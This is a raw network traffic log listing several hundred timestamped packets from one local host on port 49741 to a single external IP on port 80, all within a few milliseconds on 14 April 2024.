Apr 14, 2024 08:45:42.058113098 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058152914 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058182955 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058202028 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058226109 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058243990 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058268070 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058294058 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058310986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058340073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058370113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058388948 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058404922 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058425903 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058451891 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058473110 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058501005 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058523893 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058552027 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058571100 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058595896 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058617115 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058638096 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058665991 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058692932 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058711052 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058727026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058756113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058775902 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058799982 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058823109 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058854103 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058881044 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058897018 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058919907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058945894 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058962107 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.058996916 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.059031963 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.059031963 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.059062004 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.059078932 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.059099913 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.059133053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.059163094 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.059181929 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060337067 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060398102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060427904 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060453892 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060533047 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060559034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060580969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060606956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060627937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060657024 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060681105 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060707092 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060723066 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060761929 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060791016 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060810089 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060828924 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060853004 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060880899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060899019 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060914993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060942888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060965061 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.060988903 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061014891 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061031103 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061054945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061083078 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061099052 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061135054 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061165094 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061183929 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061211109 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061229944 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061245918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061274052 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061300993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061316967 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061351061 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061381102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061381102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061408997 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061430931 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061459064 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061477900 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061508894 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061533928 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061549902 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061572075 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061595917 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061614037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061640024 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061664104 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061687946 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061714888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061731100 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061752081 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061779022 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061800003 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061832905 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061861992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061881065 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061904907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061932087 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061949015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.061975956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062004089 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062020063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062042952 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062067986 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062087059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062114954 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062144041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062171936 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062197924 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062216997 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062248945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062277079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062293053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062315941 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062341928 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062359095 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062386990 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062412977 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062428951 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062452078 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062478065 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062494993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062532902 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062580109 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062581062 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062619925 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062619925 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062639952 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062675953 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062700033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062719107 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062752962 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062752962 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062783003 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062802076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062822104 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062848091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062875032 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062896013 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062922001 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062944889 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062971115 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.062988997 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063024044 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063055992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063055992 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063081026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063103914 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063126087 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063154936 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063173056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063201904 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063221931 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063250065 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063277960 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063307047 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063324928 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063340902 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063369989 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063399076 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063417912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063443899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063472033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063472033 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063502073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063524008 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063559055 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063586950 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063606024 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063632965 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063652039 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063679934 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063699007 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063723087 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063739061 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063756943 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063782930 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063807011 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063832045 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063859940 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063878059 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063901901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063929081 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063960075 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063991070 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.063991070 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064016104 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064037085 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064063072 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064081907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064110041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064126968 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064153910 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064173937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064208031 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064265966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064266920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064266920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064304113 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064322948 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064340115 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064357996 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064388037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064410925 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064428091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064450026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064476013 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064493895 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064522982 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064549923 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064565897 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064594030 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064623117 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064639091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064665079 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064682007 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064713955 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064743042 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064760923 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064789057 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064800024 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064817905 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064842939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064863920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064892054 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064918041 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064939976 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064964056 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.064989090 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065002918 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065031052 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065045118 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065100908 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065135956 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065160036 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065180063 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065205097 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065228939 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065248966 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065270901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065296888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065318108 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065341949 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065363884 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065383911 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065401077 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065423012 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065444946 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065468073 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065485954 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065507889 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065531969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065553904 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065572023 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065594912 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065623999 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065644026 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065664053 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065685034 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065706015 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065726995 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065753937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065773964 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065797091 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065820932 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065841913 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065867901 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065893888 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065917969 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065942049 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065964937 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.065989971 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066015005 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066039085 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066061020 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066085100 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066108942 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066133976 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066154957 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066179037 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066204071 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066227913 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066251993 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066274881 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066298008 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066320896 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066339016 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066369057 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066392899 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066416979 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066435099 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066458941 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066483021 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066505909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066529989 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066554070 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066576004 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066602945 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066620111 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066648006 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066673040 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066694975 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066716909 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066740990 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066766024 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066787004 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066804886 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066829920 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066855907 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066880941 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066904068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066929102 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066951990 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066976070 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.066998959 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067023039 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067044973 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067065954 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067090988 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067115068 CEST	49741	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:42.067141056 CEST	49741	80	192.168.2.4	91.202.233.180
